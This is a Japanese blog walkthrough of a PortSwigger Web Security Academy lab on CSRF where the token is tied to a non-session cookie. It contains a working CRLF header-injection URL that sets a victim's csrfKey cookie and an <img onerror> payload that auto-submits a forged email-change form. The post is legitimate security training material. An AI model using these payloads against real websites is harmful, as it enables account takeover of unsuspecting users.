Shikata Ga Nai

Private? There is no such things.

CSRF where token is tied to non-session cookieをやってみた

Hello there, ('ω')ノ

 

トークンが非セッションCookieに関連付けられているCSRFを。

このラボのメール変更機能はCSRFに対して脆弱で。

トークンはサイトのセッション処理システムに完全には統合されていなとのこと。

CSRF攻撃で、電子メールアドレスを変更せよと。

carlos ⇨ wienerのメールアドレスを変更することに。

まずは、wienerでログインして。

 

f:id:ThisIsOne:20210330164203p:plain

 

検索してみると。

 

f:id:ThisIsOne:20210330164242p:plain

 

検索ワードが、Set-Cookieヘッダに反映されていて。

 

f:id:ThisIsOne:20210330183601p:plain


URLに下記のパラメータを追加して実行してみると。

 

 https://ac8e1fe01ea6db3d800733d600700052.web-security-academy.net/?search=abc123%0D%0ASet-Cookie: csrfKey=test

 

f:id:ThisIsOne:20210330170118p:plain

 

被害者のブラウザにCookieを挿入できるので、この脆弱性を利用するとに。

 

f:id:ThisIsOne:20210330183918p:plain


念のため、メールアドレスの変更動作確認を。

 

f:id:ThisIsOne:20210330164420p:plain

 

一応、リクエストをリピータへあげておくことに。

 

f:id:ThisIsOne:20210330165041p:plain


一方、プライベートウィンドウを開いて。

carlosでログインして。

 

f:id:ThisIsOne:20210330164814p:plain

 

メールアドレスを変更してみて。

 

f:id:ThisIsOne:20210330164852p:plain

 

リクエストをリピータへ。

 

f:id:ThisIsOne:20210330165120p:plain

 

リクエストを確認すると csrfKey cookieとcsrf パラメータが確認できて。

このリクエストをCSRF PoCへ。

 

Cookie: LastSearchTerm=abc123; session=Ldv8aDl1qZuTkXcmE4fWE1u4oSEF7SAn; csrfKey=IzBbcEy3QlJyJoxDGTwUtdWrPO1uALlM
Upgrade-Insecure-Requests: 1

email=hack%40mail.com&csrf=Y5RAhU7ma8BpfUPnNWfopd7KzY6aZosB

 

f:id:ThisIsOne:20210330165151p:plain

 

オプションを設定して。

 

f:id:ThisIsOne:20210330165216p:plain

 

上部のエリアで変更後のメールアドレスに変更して、Regenerateを。

 

f:id:ThisIsOne:20210330165258p:plain

 

はじめに脆弱性を確認して検索機能にはCSRF保護がなかったので。

上部エリアにあるcarlosのcsrfKeyを。

 csrfKey=IzBbcEy3QlJyJoxDGTwUtdWrPO1uALlM

 

検索で使用したURLを利用して、CSRFトークン生成のためcsrfKeyを置き換えて。

下部のCSRF HTMLのパラメータをscriptブロックに挿入してCopy HTMLを。


 <img src="https://ac8e1fe01ea6db3d800733d600700052.web-security-academy.net/?search=abc123%0D%0ASet-Cookie: csrfKey=IzBbcEy3QlJyJoxDGTwUtdWrPO1uALlM" onerror="document.forms[0].submit()">

 

f:id:ThisIsOne:20210330170607p:plain

 

HTMLを貼り付けて、Storeすると。

 

f:id:ThisIsOne:20210330170718p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210330170738p:plain

 

View exploitをクリックするとエクスプロイトのページが表示されて。

 

f:id:ThisIsOne:20210330170840p:plain

 

メールアドレスが下記に変更となっていて。

 hacked@mail.com

 

f:id:ThisIsOne:20210330170930p:plain

 

Best regards, (^^ゞ